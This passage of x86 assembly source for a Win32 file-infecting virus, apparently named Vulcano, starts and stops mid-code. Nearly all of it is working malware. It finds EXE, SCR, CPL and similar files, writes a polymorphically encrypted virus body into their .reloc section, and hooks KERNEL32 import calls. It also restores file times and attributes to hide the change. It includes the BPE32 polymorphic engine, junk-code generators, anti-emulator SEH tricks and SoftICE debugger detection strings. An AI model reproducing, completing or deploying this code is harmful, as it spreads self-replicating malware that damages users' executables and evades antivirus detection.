ddCloseHandle - mgdelta] ;close file mapping lea eax, [ebp + data_buffer.WFD_ftLastWriteTime - mgdelta] push eax lea eax, [ebp + data_buffer.WFD_ftLastAccessTime - mgdelta] push eax lea eax, [ebp + data_buffer.WFD_ftCreationTime - mgdelta] push eax push dword ptr [ebp + hFile - mgdelta] mov eax, 0 ddSetFileTime = dword ptr $-4 call eax ;set back file time push_LARGE_0 ;store handle hFile = dword ptr $-4 call [ebp + ddCloseHandle - mgdelta] ;close file r_attr: push dword ptr [ebp + data_buffer - mgdelta] lea esi, [ebp + data_buffer.WFD_szFileName - mgdelta] push esi ;filename call [ebp + ddSetFileAttributesA - mgdelta] ;set back file attributes jmp c_error ;and quit nOpen: mov ebx, ecx cmp word ptr [ebx], IMAGE_DOS_SIGNATURE ;must be MZ jne endMapFile mov esi, [ebx.MZ_lfanew] add esi, ebx lodsd cmp eax, IMAGE_NT_SIGNATURE ;must be PE\0\0 jne endMapFile cmp word ptr [esi.FH_Machine], IMAGE_FILE_MACHINE_I386 ;must be 386+ jne endMapFile mov ax, [esi.FH_Characteristics] test ax, IMAGE_FILE_EXECUTABLE_IMAGE ;must be executable je endMapFile test ax, IMAGE_FILE_DLL ;mustnt be DLL jne endMapFile test ax, IMAGE_FILE_SYSTEM ;mustnt be system file jne endMapFile mov al, byte ptr [esi.OH_Subsystem] test al, IMAGE_SUBSYSTEM_NATIVE ;and mustnt be driver (thanx GriYo !) jne endMapFile movzx ecx, word ptr [esi.FH_NumberOfSections] ;must be more than one section dec ecx test ecx, ecx je endMapFile imul eax, ecx, IMAGE_SIZEOF_SECTION_HEADER movzx edx, word ptr [esi.FH_SizeOfOptionalHeader] lea edi, [eax+edx+IMAGE_SIZEOF_FILE_HEADER] add edi, esi ;get to section header lea edx, [esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress-4] mov eax, [edx] test eax, eax je endMapFile ;quit if no relocs mov ecx, [edi.SH_VirtualAddress] cmp ecx, eax jne endMapFile ;is it .reloc section? cmp [edi.SH_SizeOfRawData], 1a00h jb endMapFile ;check if .reloc is big enough pushad xor eax, eax mov edi, edx stosd ;erase .reloc records stosd popad mov eax, ebx ;now we will try to xor ecx, ecx ;patch it_patch: pushad ;one API call mov edx, dword ptr [ebp + crcpAPIs + ecx*4 - mgdelta] ;get CRC32 test edx, edx jne c_patch popad jmp end_patch ;quit if end of record c_patch:push dword ptr [edi.SH_VirtualAddress] ;patch address push edx ;CRC32 mov [ebp + r2rp - mgdelta], eax ;infection stage call PatchIT ;try to patch API call mov [esp.Pushad_edx], eax ;save address test eax, eax popad jne end_patch ;quit if we got address inc ecx jmp it_patch ;API call not found, try another API end_patch: mov eax, edx mov edx, [esi.NT_OptionalHeader.OH_ImageBase-4] ;get Image base mov [ebp + compressed + (ImgBase-decompressed) - mgdelta], edx ;save it lea edx, [ebp + compressed + (ddAPI-decompressed) - mgdelta] push dword ptr [edx] ;store prev. API call mov [edx], eax ;save new one pushad ;store all registers lea esi, [ebp + compressed+(VulcanoInit-decompressed) - mgdelta] mov edi, [edi.SH_PointerToRawData] add edi, ebx ;where to write body mov ecx, (decompressed-VulcanoInit+3)/4 ;size of virus body call BPE32 ;write morphed body to file! mov [esp.Pushad_eax], eax ;save size popad pop dword ptr [edx] ;restore API call or dword ptr [edi.SH_Characteristics], IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE ;set flags lea ecx, [edi.SH_VirtualSize] ;get virtual size add [ecx], eax ;correct it mov ecx, [esi.NT_OptionalHeader.OH_FileAlignment-4] xor edx, edx div ecx inc eax mul ecx mov edx, [edi.SH_SizeOfRawData] mov [edi.SH_SizeOfRawData], eax ;align SizeOfRawData test dword ptr [edi.SH_Characteristics], IMAGE_SCN_CNT_INITIALIZED_DATA je rs_ok sub eax, edx add [esi.NT_OptionalHeader.OH_SizeOfInitializedData-4], eax ;update next field, if needed rs_ok: mov eax, [edi.SH_VirtualAddress] add eax, [edi.SH_VirtualSize] xor edx, edx mov ecx, [esi.NT_OptionalHeader.OH_SectionAlignment-4] div ecx inc eax mul ecx mov [esi.NT_OptionalHeader.OH_SizeOfImage-4], eax ;new SizeOfImage jmp endMapFile ;everything is ok, we can quit CheckFile: pushad mov ebx, esi test [ebx.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY jne c_error ;discard directory entries xor ecx, ecx cmp [ebx.WFD_nFileSizeHigh], ecx ;discard files >4GB jne c_error mov edi, [ebx.WFD_nFileSizeLow] cmp edi, 4000h ;discard small files jb c_error lea esi, [ebx.WFD_szFileName] ;get filename push esi endf: lodsb cmp al, '.' ;search for dot jne endf dec esi lodsd ;get filename extension or eax, 20202020h ;make it lowercase not eax ;mask it pop esi cmp eax, not 'exe.' ;is it EXE? je extOK cmp eax, not 'rcs.' ;is it SCR? je extOK cmp eax, not 'xfs.' ;is it SFX? je extOK cmp eax, not 'lpc.' ;is it CPL? je extOK cmp eax, not 'tad.' ;is it DAT? je extOK cmp eax, not 'kab.' ;is it BAK? je extOK xor ecx, ecx inc ecx c_error:mov [esp.Pushad_ecx], ecx ;save result popad ret extOK: push FILE_ATTRIBUTE_NORMAL ;normal file push esi ;filename mov eax, 0 ddSetFileAttributesA = dword ptr $-4 call eax ;blank file attributes xchg eax, ecx jmp c_error get_set_VLCB: ;get/set VLCB records procedure (IPC) ;input: ECX - 0=set/wait else wait/get ; ESI - pointer to data, if ECX!=0 ; EBX - ID number of request ; EDX - -1, if random thread, otherwise ; - number of thread. ;output:ECX - if input ECX!=0, ECX=ID ; - if error, ECX=-1 ; EDX - if ECX!=0, number of thread ; ESI - ptr to data, if input ECX=0 mov edi, 0 vlcbBase = dword ptr $-4 inc edx je t_rnd ;get random record dec edx imul eax, edx, VLCB_TSize-8 add edi, eax jecxz sw_VLCB cmp dword ptr [edi.VLCB_TSep.VLCB_THandle], 0 je qq call w_wait ;wait for free mutex pushad xchg esi, edi lea esi, [esi.VLCB_TSep.VLCB_TData] mov ecx, (VLCB_TSize-8)/4 rep movsd ;copy data popad mov ecx, [edi.VLCB_TSep.VLCB_TID] ;get ID push ecx call r_mutex ;release mutex pop ecx ret ;and quit t_next: add edi, VLCB_TSize-8 ;move to next record inc edx loop tsrch qqq: pop ecx qq: xor ecx, ecx dec ecx ret t_rnd: push ecx ;pass thru 20 records push 20 pop ecx xor edx, edx tsrch: cmp dword ptr [edi.VLCB_TSep.VLCB_THandle], 0 je t_next ;check if its free pop ecx sw_VLCB:call w_wait ;wait for free mutex pushad lea edi, [edi.VLCB_TSep.VLCB_TData] mov ecx, (VLCB_TSize-8)/4 rep movsd ;copy data popad mov [edi.VLCB_TSep.VLCB_TID], ebx pushad lea esi, [edi.VLCB_TSep.VLCB_TData.WFD_szAlternateFileName] mov ebp, [esi] ;get result call r_mutex ;signalize mutex slp: call sleep ;switch to next thread cmp [esi], ebp ;check for change je slp ;no change, wait popad xor ecx, ecx ret ;quit w_wait: call open_mutex ;open mutex push eax push 10000 ;wait 10 seconds push eax mov eax, 0 ddWaitForSingleObject = dword ptr $-4 call eax test eax, eax pop eax jne qqq ;quit if not signalized call close_mutex ;close mutex ret ;and quit open_mutex: lea eax, [edi.VLCB_TSep.VLCB_THandle] ;name of mutex push eax push 0 push 0f0000h or 100000h or 1 ;access flags mov eax, 0 ddOpenMutexA = dword ptr $-4 ;open mutex call eax ret r_mutex:call open_mutex ;open mutex push eax push eax mov eax, 0 ddReleaseMutex = dword ptr $-4 call eax ;singalize mutex pop eax close_mutex: push eax mov eax, 0 ddCloseHandle = dword ptr $-4 call eax ;close mutex ret sleep: push 0 ;switch to next thread mov eax, 0 ddSleep = dword ptr $-4 call eax ;switch! ret Check&Infect: pushad mov esi, ebx ;get ptr to data pushad call vlcb_stuph ;common stuph mov ebx, VLCB_Check ;check only call get_set_VLCB ;IPC! inc ecx popad je _ret_ ;quit if error mov eax, dword ptr [esi.WFD_szAlternateFileName] dec eax test eax, eax je _ret_ sc1_ok: call vlcb_stuph ;common stuph mov ebx, VLCB_Infect ;check and infect call get_set_VLCB ;IPC! _ret_: popad ret CRC32: push ecx ;procedure to calculate CRC32 push edx push ebx xor ecx, ecx dec ecx mov edx, ecx NextByteCRC: xor eax, eax xor ebx, ebx lodsb xor al, cl mov cl, ch mov ch, dl mov dl, dh mov dh, 8 NextBitCRC: shr bx, 1 rcr ax, 1 jnc NoCRC xor ax, 08320h xor bx, 0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx, eax xor edx, ebx dec edi jne NextByteCRC not edx not ecx pop ebx mov eax, edx rol eax, 16 mov ax, cx pop edx pop ecx ret SearchET: ;procedure for recieving API names from Export table pushad ;save all registers @SEH_SetupFrame ;setup SEH frame mov edi, [eax.MZ_lfanew] ;get ptr to PE header add edi, eax ;make pointer raw mov ecx, [edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size] jecxz address_not_found ;quit, if no exports mov ebx, eax add ebx, [edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress] mov edx, eax ;get RVA to Export table add edx, [ebx.ED_AddressOfNames] ;offset to names mov ecx, [ebx.ED_NumberOfNames] ;number of name mov edi, esi push edi xchg eax, ebp xor eax, eax APIname:push eax mov esi, ebp add esi, [edx+eax*4] ;get to API name push esi @endsz ;get to the end of API name sub esi, [esp] ;get size of API name mov edi, esi ;to EDI pop esi ;restore ptr to API name call CRC32 ;get its CRC32 mov edi, [esp+4] ;get requested CRC32 cmp eax, [edi] ;is it same pop eax je mcrc ;yeah nchar: inc eax ;no, increment counter loop APIname ;and get next API name pop eax ;clean stack address_not_found: xor eax, eax ;and quit jmp endGPA mcrc: pop edx mov edx, ebp add edx, [ebx.ED_AddressOfOrdinals] ;skip over ordinals movzx eax, word ptr [edx+eax*2] cmp eax, [ebx.ED_NumberOfFunctions] jae address_not_found mov edx, ebp add edx, [ebx.ED_AddressOfFunctions] ;get start of function addresses add ebp, [edx+eax*4] ;make it pointer to our API xchg eax, ebp ;address to EAX endGPA: @SEH_RemoveFrame ;remove SEH frame mov [esp.Pushad_eax], eax ;store address popad ;restore all registers ret ;and quit a_go: inc esi ;jump over alignments inc esi pushad ;store all registers xor edx, edx ;zero EDX xchg eax, esi push 2 pop ecx div ecx test edx, edx je end_align ;no alignments needed inc eax ;align API name end_align: mul ecx mov [esp.Pushad_esi], eax popad ;restore all registers ret PatchIT Proc ;procedure for patching API calls pushad ;store all registers @SEH_SetupFrame ;setup SEH frame call itDlta itDelta:db 0b8h itDlta: pop ebp mov [ebp + gmh - itDelta], eax ;save it mov ebx, [eax.MZ_lfanew] ;get to PE header add ebx, eax ;make pointer raw push dword ptr [ebx.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress] call rva2raw pop edx sub edx, IMAGE_SIZEOF_IMPORT_DESCRIPTOR push edi n_dll: pop edi add edx, IMAGE_SIZEOF_IMPORT_DESCRIPTOR lea edi, [ebp + szK32 - itDelta] ;get Kernel32 name mov esi, [edx] test esi, esi je endPIT sdll: push dword ptr [edx.ID_Name] call rva2raw pop esi push edi cmpsd ;is it K32? jne n_dll cmpsd jne n_dll cmpsd jne n_dll pop edi xor ecx, ecx ;zero counter push dword ptr [edx.ID_OriginalFirstThunk] ;get first record call rva2raw pop esi push dword ptr [esi] ;get first API name call rva2raw pop esi pit_align: call a_go push esi ;store pointer @endsz ;get to the end of API name mov edi, esi sub edi, [esp] ;move size of API name to EDI pop esi ;restore pointer push eax ;store EAX call CRC32 ;calculate CRC32 of API name cmp eax, [esp.cPushad+10h] ;check, if it is requested API je a_ok ;yeah, it is inc ecx mov eax, [esi] ;check, if there is next API test eax, eax ;... pop eax ;restore EAX jne pit_align ;yeah, check it jmp endPIT ;no, quit a_ok: pop eax ;restore EAX push dword ptr [edx.ID_FirstThunk] ;get address to IAT call rva2raw pop edx mov eax, [edx+ecx*4] ;get address mov [esp.Pushad_eax+8], eax ;and save it to stack pushad ;store all registers mov eax, 0 ;get base address of program gmh = dword ptr $-4 mov ebx, [eax.MZ_lfanew] add ebx, eax ;get PE header push dword ptr [ebx.NT_OptionalHeader.OH_BaseOfCode] ;get base of code call rva2raw ;normalize pop esi ;to ESI mov ecx, [ebx.NT_OptionalHeader.OH_SizeOfCode] ;and its size pushad call p_var dd ? p_var: push PAGE_EXECUTE_READWRITE push ecx push esi mov eax, 0 ddVirtualProtect = dword ptr $-4 call eax ;set writable right test eax, eax popad je endPIT sJMP: mov dl, [esi] ;get byte from code inc esi cmp dl, 0ffh ;is it JMP/CALL? jne lJMP ;check, if it is cmp byte ptr [esi], 25h ;JMP DWORD PTR [XXXXXXXXh] je gIT1 cmp byte ptr [esi], 15h ;or CALL DWORD PTR [XXXXXXXXh] jne lJMP mov dl, 0e8h jmp gIT2 gIT1: mov dl, 0e9h gIT2: mov [ebp + j_or_c - itDelta], dl ;change opcode mov edi, [ebx.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress] add edi, [ebx.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_Size] push ecx mov ecx, [ebx.NT_OptionalHeader.OH_ImageBase] add edi, ecx push ebp mov ebp, [esi+1] sub ebp, ecx push ebp call rva2raw pop ebp sub ebp, eax add ebp, ecx sub edi, ebp pop ebp pop ecx js lJMP ;check, if it is correct address push ecx push edx ;store EDX mov edx, [esp.Pushad_ecx+8] ;get counter imul edx, 4 ;multiply it by 4 add edx, [esp.Pushad_edx+8] ;add address to IAT to ptr sub edx, eax mov ecx, [esi+1] sub ecx, [ebx.NT_OptionalHeader.OH_ImageBase] push ecx call rva2raw pop ecx sub ecx, eax cmp edx, ecx ;is it current address pop edx pop ecx ;restore EDX jne sJMP ;no, get next address mov eax, [esi+1] mov [esp.cPushad.Pushad_eax+8], eax ;store register to stack mov [esp.Pushad_esi], esi ;for l8r use popad ;restore all registers mov byte ptr [esi-1], 0e9h ;build JMP or CALL j_or_c = byte ptr $-1 mov ebx, [esi+1] mov eax, [esp.cPushad+10h] ;get address add eax, [ebp + gmh - itDelta] sub eax, esi ;- current address sub eax, 4 ;+1-5 mov [esi], eax ;store built jmp instruction mov byte ptr [esi+4], 90h xchg eax, ebx jmp endIT ;and quit lJMP: dec ecx jecxz endPIT-1 jmp sJMP ;search in a loop popad ;restore all registers endPIT: xor eax, eax mov [esp.Pushad_eax+8], eax endIT: @SEH_RemoveFrame ;remove SEH frame popad ;restore all registers ret 8 ;and quit PatchIT EndP rva2raw:pushad ;procedure for converting RVAs to RAW pointers mov ecx, 0 ;0 if actual program r2rp = dword ptr $-4 jecxz nr2r mov edx, [esp.cPushad+4] ;no comments needed :) movzx ecx, word ptr [ebx.NT_FileHeader.FH_NumberOfSections] movzx esi, word ptr [ebx.NT_FileHeader.FH_SizeOfOptionalHeader] lea esi, [esi+ebx+IMAGE_SIZEOF_FILE_HEADER+4] n_r2r: mov edi, [esi.SH_VirtualAddress] add edi, [esi.SH_VirtualSize] cmp edx, edi jb c_r2r add esi, IMAGE_SIZEOF_SECTION_HEADER loop n_r2r popad ret nr2r: add [esp.cPushad+4], eax popad ret c_r2r: add eax, [esi.SH_PointerToRawData] add eax, edx sub eax, [esi.SH_VirtualAddress] mov [esp.cPushad+4], eax popad ret NewThread: ;thread starts here pushad ;store all registers @SEH_SetupFrame mov ebp, [esp+2ch] ;get delta parameter xor ecx, ecx ;zero ECX and dword ptr [ebp + r2rp - gdelta], 0 g_hook: mov eax, [ebp + newHookers + ecx*4 - gdelta] ;take address to hooker test eax, eax ;is it 0? je q_hook ;yeah, quit add eax, ebp sub eax, [ebp + GMHA - gdelta] push eax ;store address push dword ptr [ebp + crchAPIs + ecx*4 - gdelta] ;store CRC32 mov eax, 0 GMHA = dword ptr $-4 call PatchIT ;and patch Import Table mov esi, [ebp + oldHookers + ecx*4 - gdelta] add esi, ebp mov [esi], eax ;save old hooker inc ecx ;increment counter jmp g_hook ;loop q_hook: @SEH_RemoveFrame popad ;restore all registers ret ;and terminate thread ;BPE32 (Benny's Polymorphic Engine for Win32) starts here. U can find first ;version of BPE32 in DDT#1 e-zine. But unfortunately, how it usualy goes, ;there were TWO, REALLY SILLY/TINY bugs. I found them and corrected them. So, ;if u wanna use BPE32 in your code, use this version, not that version from ;DDT#1. Very BIG sorry to everyone, who had/has/will have problems with it. ;I also included there SALC opcode as a junk instruction. BPE32 Proc pushad ;save all regs push edi ;save these regs for l8r use push ecx ; ... mov edx, edi ; ... push esi ;preserve this reg call rjunk ;generate random junk instructions pop esi ;restore it mov al, 0e8h ;create CALL instruction stosb ; ... mov eax, ecx ; ... imul eax, 4 ; ... stosd ; ... mov eax, edx ;calculate size of CALL+junx sub edx, edi ; ... neg edx ; ... add edx, eax ; ... push edx ;save it push 0 ;get random number call random ; ... xchg edx, eax mov [ebp + xor_key - mgdelta], edx ;use it as xor constant push 0 ;get random number call random ; ... xchg ebx, eax mov [ebp + key_inc - mgdelta], ebx ;use it as key increment constant x_loop: lodsd ;load DWORD xor eax, edx ;encrypt it stosd ;store encrypted DWORD add edx, ebx ;increment key loop x_loop ;next DWORD call rjunk ;generate junx mov eax, 0006e860h ;generate SEH handler stosd ; ... mov eax, 648b0000h ; ... stosd ; ... mov eax, 0ceb0824h ; ... stosd ; ... greg0: call get_reg ;get random register cmp al, 5 ;MUST NOT be EBP register je greg0 mov bl, al ;store register mov dl, 11 ;proc parameter (do not generate MOV) call make_xor ;create XOR or SUB instruction inc edx ;destroy parameter mov al, 64h ;generate FS: stosb ;store it mov eax, 896430ffh ;next SEH instructions or ah, bl ;change register stosd ;store them mov al, 20h ; ... add al, bl ; ... stosb ; ... push 2 ;get random number call random test eax, eax je _byte_ mov al, 0feh ;generate INC DWORD PTR jmp _dw_ _byte_: mov al, 0ffh ;generate INC BYTE PTR _dw_: stosb ;store it mov al, bl ;store register stosb ; ... mov al, 0ebh ;generate JUMP SHORT stosb ; ... mov al, -24d ;generate jump to start of code (trick stosb ;for better emulators, e.g. NODICE32) call rjunk ;generate junx greg1: call get_reg ;generate random register cmp al, 5 ;MUST NOT be EBP je greg1 mov bl, al ;store it call make_xor ;generate XOR,SUB reg, reg or MOV reg, 0 mov al, 64h ;next SEH instructions stosb ; ... mov al, 8fh ; ... stosb ; ... mov al, bl ; ... stosb ; ... mov al, 58h ; ... add al, bl ; ... stosb ; ... mov al, 0e8h ;generate CALL stosb ; ... xor eax, eax ; ... stosd ; ... push edi ;store for l8r use call rjunk ;call junk generator call get_reg ;random register mov bl, al ;store it push 1 ;random number (0-1) call random ; ... test eax, eax jne next_delta mov al, 8bh ;generate MOV reg, [ESP]; POP EAX stosb mov al, 80h or al, bl rol al, 3 stosb mov al, 24h stosb mov al, 58h jmp bdelta next_delta: mov al, bl ;generate POP reg; SUB reg, ... add al, 58h bdelta: stosb mov al, 81h stosb mov al, 0e8h add al, bl stosb pop eax stosd call rjunk ;random junx xor bh, bh ;parameter (first execution only) call greg2 ;generate MOV sourcereg, ... mov al, 3 ;generate ADD sourcereg, deltaoffset stosb ; ... mov al, 18h ; ... or al, bh ; ... rol al, 3 ; ... or al, bl ; ... stosb ; ... mov esi, ebx ;store EBX call greg2 ;generate MOV countreg, ... mov cl, bh ;store count register mov ebx, esi ;restore EBX call greg3 ;generate MOV keyreg, ... push edi ;store this position for jump to decryptor mov al, 31h ;generate XOR [sourcereg], keyreg stosb ; ... mov al, ch ; ... rol al, 3 ; ... or al, bh ; ... stosb ; ... push 6 ;this stuff will choose ordinary of calls call random ;to code generators test eax, eax je g5 ;GREG4 - key incremention cmp al, 1 ;GREG5 - source incremention je g1 ;GREG6 - count decremention cmp al, 2 ;GREG7 - decryption loop je g2 cmp al, 3 je g3 cmp al, 4 je g4 g0: call gg1 call greg6 jmp g_end g1: call gg2 call greg5 jmp g_end g2: call greg5 call gg2 jmp g_end g3: call greg5 gg3: call greg6 jmp g_out g4: call greg6 call gg1 jmp g_end g5: call greg6 call greg5 g_out: call greg4 g_end: call greg7 mov al, 61h ;generate POPAD instruction stosb ; ... call rjunk ;junk instruction generator mov al, 0c3h ;RET instruction stosb ; ... pop eax ;calculate size of decryptor and encrypted data sub eax, edi ; ... neg eax ; ... mov [esp.Pushad_eax], eax ;store it to EAX register popad ;restore all regs ret ;and thats all folx get_reg proc ;this procedure generates random register push 8 ;random number (0-7) call random ; ... test eax, eax je get_reg ;MUST NOT be 0 (=EAX is used as junk register) cmp al, 100b ;MUST NOT be ESP je get_reg ret get_reg endp make_xor proc ;this procedure will generate instruction, that push 3 ;will nulify register (BL as parameter) call random test eax, eax je _sub_ cmp al, 1 je _mov_ mov al, 33h ;generate XOR reg, reg jmp _xor_ _sub_: mov al, 2bh ;generate SUB reg, reg _xor_: stosb mov al, 18h or al, bl rol al, 3 or al, bl stosb ret _mov_: cmp dl, 11 ;generate MOV reg, 0 je make_xor mov al, 0b8h add al, bl stosb xor eax, eax stosd ret make_xor endp gg1: call greg4 jmp greg5 gg2: call greg4 jmp greg6 random proc ;this procedure will generate random number ;in range from 0 to pushed_parameter-1 ;0 = do not truncate result push edx ;save EDX RDTCS ;RDTCS instruction - reads PCs tix and stores ;number of them into pair EDX:EAX xor edx, edx ;nulify EDX, we need only EAX cmp [esp+8], edx ;is parameter==0 ? je r_out ;yeah, do not truncate result div dword ptr [esp+8] ;divide it xchg eax, edx ;remainder as result r_out: pop edx ;restore EDX ret Pshd ;quit procedure and destroy pushed parameter random endp make_xor2 proc ;create XOR instruction mov al, 81h stosb mov al, 0f0h add al, bh stosb ret make_xor2 endp greg2 proc ;1 parameter = source/count value call get_reg ;get register cmp al, bl ;already used ? je greg2 cmp al, 5 je greg2 cmp al, bh je greg2 mov bh, al mov ecx, [esp+4] ;get parameter push 5 ;choose instructions call random test eax, eax je s_next0 cmp al, 1 je s_next1 cmp al, 2 je s_next2 cmp al, 3 je s_next3 mov al, 0b8h ;MOV reg, random_value add al, bh ;XOR reg, value stosb ;param = random_value xor value push 0 call random xor ecx, eax stosd call make_xor2 mov eax, ecx jmp n_end2 s_next0:mov al, 68h ;PUSH random_value stosb ;POP reg push 0 ;XOR reg, value call random ;result = random_value xor value xchg eax, ecx xor eax, ecx stosd mov al, 58h add al, bh stosb call make_xor2 xchg eax, ecx jmp n_end2 s_next1:mov al, 0b8h ;MOV EAX, random_value stosb ;MOV reg, EAX push 0 ;SUB reg, value call random ;result = random_value - value stosd push eax mov al, 8bh stosb mov al, 18h or al, bh rol al, 3 stosb mov al, 81h stosb mov al, 0e8h add al, bh stosb pop eax sub eax, ecx jmp n_end2 s_next2:push ebx ;XOR reg, reg mov bl, bh ;XOR reg, random_value call make_xor ;ADD reg, value pop ebx ;result = random_value + value call make_xor2 push 0 call random sub ecx, eax stosd push ecx call s_lbl pop eax jmp n_end2 s_lbl: mov al, 81h ;create ADD reg, ... instruction stosb mov al, 0c0h add al, bh stosb ret s_next3:push ebx ;XOR reg, reg mov bl, bh ;ADD reg, random_value call make_xor ;XOR reg, value pop ebx ;result = random_value xor value push 0 call random push eax xor eax, ecx xchg eax, ecx call s_lbl xchg eax, ecx stosd call make_xor2 pop eax n_end2: stosd push esi call rjunk pop esi ret Pshd greg2 endp greg3 proc call get_reg ;get register cmp al, 5 ;already used ? je greg3 cmp al, bl je greg3 cmp al, bh je greg3 cmp al, cl je greg3 mov ch, al mov edx, 0 ;get encryption key value xor_key = dword ptr $ - 4 push 3 call random test eax, eax je k_next1 cmp al, 1 je k_next2 push ebx ;XOR reg, reg mov bl, ch ;OR, ADD, XOR reg, value call make_xor pop ebx mov al, 81h stosb push 3 call random test eax, eax je k_nxt2 cmp al, 1 je k_nxt3 mov al, 0c0h k_nxt1: add al, ch stosb xchg eax, edx n_end1: stosd k_end: call rjunk ret k_nxt2: mov al, 0f0h jmp k_nxt1 k_nxt3: mov al, 0c8h jmp k_nxt1 k_next1:mov al, 0b8h ;MOV reg, value jmp k_nxt1 k_next2:mov al, 68h ;PUSH value stosb ;POP reg xchg eax, edx stosd mov al, ch add al, 58h jmp i_end1 greg3 endp greg4 proc mov edx, 0 ;get key increment value key_inc = dword ptr $ - 4 i_next: push 3 call random test eax, eax je i_next0 cmp al, 1 je i_next1 cmp al, 2 je i_next2 mov al, 90h ;XCHG EAX, reg add al, ch ;XOR reg, reg stosb ;OR reg, EAX push ebx ;ADD reg, value mov bl, ch call make_xor pop ebx mov al, 0bh stosb mov al, 18h add al, ch rol al, 3 stosb i_next0:mov al, 81h ;ADD reg, value stosb mov al, 0c0h add al, ch stosb xchg eax, edx jmp n_end1 i_next1:mov al, 0b8h ;MOV EAX, value stosb ;ADD reg, EAX xchg eax, edx stosd mov al, 3 stosb mov al, 18h or al, ch rol al, 3 i_end1: stosb i_end2: call rjunk ret i_next2:mov al, 8bh ;MOV EAX, reg stosb ;ADD EAX, value mov al, 0c0h ;XCHG EAX, reg add al, ch stosb mov al, 5 stosb xchg eax, edx stosd mov al, 90h add al, ch jmp i_end1 greg4 endp greg5 proc push ecx mov ch, bh push 4 pop edx push 2 call random test eax, eax jne ng5 call i_next ;same as previous, value=4 pop ecx jmp k_end ng5: mov al, 40h ;4x inc reg add al, ch pop ecx stosb stosb stosb jmp i_end1 greg5 endp greg6 proc push 5 call random test eax, eax je d_next0 cmp al, 1 je d_next1 cmp al, 2 je d_next2 mov al, 83h ;SUB reg, 1 stosb mov al, 0e8h add al, cl stosb mov al, 1 jmp i_end1 d_next0:mov al, 48h ;DEC reg add al, cl jmp i_end1 d_next1:mov al, 0b8h ;MOV EAX, random_value stosb ;SUB reg, EAX push 0 ;ADD reg, random_value-1 call random mov edx, eax stosd mov al, 2bh stosb mov al, 18h add al, cl rol al, 3 stosb mov al, 81h stosb mov al, 0c0h add al, cl stosb dec edx mov eax, edx jmp n_end1 d_next2:mov al, 90h ;XCHG EAX, reg add al, cl ;DEC EAX stosb ;XCHG EAX, reg mov al, 48h stosb mov al, 90h add al, cl jmp i_end1 greg6 endp greg7 proc mov edx, [esp+4] dec edx push 2 call random test eax, eax je l_next0 mov al, 51h ;PUSH ECX stosb ;MOV ECX, reg mov al, 8bh ;JECXZ label stosb ;POP ECX mov al, 0c8h ;JMP decrypt_loop add al, cl ;label: stosb ;POP ECX mov eax, 0eb5903e3h stosd sub edx, edi mov al, dl stosb mov al, 59h jmp l_next l_next0:push ebx ;XOR EAX, EAX xor bl, bl ;DEC EAX call make_xor ;ADD EAX, reg pop ebx ;JNS decrypt_loop mov al, 48h stosb mov al, 3 stosb mov al, 0c0h add al, cl stosb mov al, 79h stosb sub edx, edi mov al, dl l_next: stosb call rjunk ret Pshd greg7 endp rjunkjc:push 7 call random jmp rjn rjunk proc ;junk instruction generator push 8 call random ;0=5, 1=1+2, 2=2+1, 3=1, 4=2, 5=3, 6=none, 7=dummy jump and call rjn: test eax, eax je j5 cmp al, 1 je j_1x2 cmp al, 2 je j_2x1 cmp al, 4 je j2 cmp al, 5 je j3 cmp al, 6 je r_end cmp al, 7 je jcj j1: call junx1 ;one byte junk instruction nop dec eax SALC inc eax clc cwde stc cld junx1: pop esi push 8 call random add esi, eax movsb ret j_1x2: call j1 ;one byte and two byte jmp j2 j_2x1: call j2 ;two byte and one byte jmp j1 j3: call junx3 db 0c1h, 0c0h ;rol eax, ... db 0c1h, 0e0h ;shl eax, ... db 0c1h, 0c8h ;ror eax, ... db 0c1h, 0e8h ;shr eax, ... db 0c1h, 0d0h ;rcl eax, ... db 0c1h, 0f8h ;sar eax, ... db 0c1h, 0d8h ;rcr eax, ... db 083h, 0c0h db 083h, 0c8h db 083h, 0d0h db 083h, 0d8h db 083h, 0e0h db 083h, 0e8h db 083h, 0f0h db 083h, 0f8h ;cmp eax, ... db 0f8h, 072h ;clc; jc ... db 0f9h, 073h ;stc; jnc ... junx3: pop esi ;three byte junk instruction push 17 call random imul eax, 2 add esi, eax movsb movsb r_ran: push 0 call random test al, al je r_ran stosb ret j2: call junx2 db 8bh ;mov eax, ... db 03h ;add eax, ... db 13h ;adc eax, ... db 2bh ;sub eax, ... db 1bh ;sbb eax, ... db 0bh ;or eax, ... db 33h ;xor eax, ... db 23h ;and eax, ... db 33h ;test eax, ... junx2: pop esi ;two byte junk instruction push 9 call random add esi, eax movsb push 8 call random add al, 11000000b stosb r_end: ret j5: call junx5 db 0b8h ;mov eax, ... db 05h ;add eax, ... db 15h ;adc eax, ... db 2dh ;sub eax, ... db 1dh ;sbb eax, ... db 0dh ;or eax, ... db 35h ;xor eax, ... db 25h ;and eax, ... db 0a9h ;test eax, ... db 3dh ;cmp eax, ... junx5: pop esi ;five byte junk instruction push 10 call random add esi, eax movsb push 0 call random stosd ret jcj: call rjunkjc ;junk push edx ;CALL label1 push ebx ;junk push ecx ;JMP label2 mov al, 0e8h ;junk stosb ;label1: junk push edi ;RET stosd ;junk push edi ;label2: call rjunkjc ;junk mov al, 0e9h stosb mov ecx, edi stosd mov ebx, edi call rjunkjc pop eax sub eax, edi neg eax mov edx, edi pop edi stosd mov edi, edx call rjunkjc mov al, 0c3h stosb call rjunkjc sub ebx, edi neg ebx xchg eax, ebx push edi mov edi, ecx stosd pop edi call rjunkjc pop ecx pop ebx pop edx ret rjunk endp BPE32 EndP ;BPE32 ends here szK32 db 'KERNEL32.dll',0 ;name of DLL sice95 db '\\.\SICE',0 ;SoftICE/95/98 siceNT db '\\.\NTICE',0 ;SoftICE/NT ;APIs needed at run-time crcAPIs dd 0AE17EBEFh ;FindFirstFileA dd 0AA700106h ;FindNextFileA dd 0C200BE21h ;FindClose dd 03C19E536h ;SetFileAttributesA dd 04B2A3E7Dh ;SetFileTime dd 08C892DDFh ;CreateFileA dd 096B2D96Ch ;CreateFileMappingA dd 0797B49ECh ;MapViewOfFile dd 